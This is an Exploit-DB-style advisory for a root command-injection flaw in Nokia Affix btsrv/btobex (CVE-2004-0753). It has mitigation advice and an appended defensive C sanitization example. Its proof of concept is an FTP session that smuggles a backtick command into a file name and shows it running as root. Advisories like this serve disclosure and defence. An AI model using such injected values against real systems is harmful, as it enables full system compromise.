Vendor: Affix BTSRV/BTOBS
By: SecurityFocus
CVSS: 9.3 HIGH
Remote Command Execution
CWE: 78
Product Name: Affix BTSRV/BTOBS
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2004-0753
CPE: o:nokia:affix_btsrv
Platforms Tested: Unknown
2004

Nokia Affix btsrv/btobex Remote Command Execution Vulnerability

Nokia Affix btsrv/btobex are reported to be affected by a remote command execution vulnerability caused by a lack of input sanitization before attacker-controlled data is used in a 'system()' call. An attacker can exploit this vulnerability to gain root privileges on the target computer.

Mitigation:

Users should apply the appropriate patch from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14232/info

Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists because attacker-controlled data is not sanitized before it is used in a 'system()' call.

Because the affected services run with superuser privileges, this issue may be exploited to fully compromise a target computer that is running the affected software.

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.
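
A defensive pattern for the flaw described above (CWE 78), given as an added example that is not code from Affix or from the vendor patch: the received object name is checked against an allow-list and the file is moved with rename(2), so no shell ever parses it. It assumes the attacker-controlled data is the remote-supplied object name, as the session suggests; the function names `is_safe_object_name` and `store_received` and the sample names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical allow-list check (not Affix code): accept only a plain
 * file name made of [A-Za-z0-9._-], so shell metacharacters such as
 * backticks, '$', ';', spaces and '/' can never reach later code. */
int is_safe_object_name(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-";
    size_t len = strlen(name);

    if (len == 0 || len > 255 || name[0] == '.' || name[0] == '-')
        return 0;                  /* empty, too long, dotfile or option-like */
    return strspn(name, allowed) == len;
}

/* Hypothetical store step: move the received temp file into the inbox
 * with rename(2) instead of building a command line for system().
 * Returns 0 on success, -1 if the name is rejected or the move fails. */
int store_received(const char *tmp_path, const char *inbox, const char *name)
{
    char dest[4096];
    int n;

    if (!is_safe_object_name(name))
        return -1;
    n = snprintf(dest, sizeof dest, "%s/%s", inbox, name);
    if (n < 0 || (size_t)n >= sizeof dest)
        return -1;                 /* destination path would be truncated */
    return rename(tmp_path, dest) == 0 ? 0 : -1;   /* no shell involved */
}

int main(void)
{
    /* Constructed sample names; the second is the one from the session above. */
    const char *names[] = { "hosts", "`id`", "../hosts", "a;b" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-10s -> %s\n", names[i],
               is_safe_object_name(names[i]) ? "accepted" : "rejected");
    return 0;
}
```

Where an external program really must be run, passing the name as a separate argv element to fork()/execv() keeps it out of shell parsing in the same way.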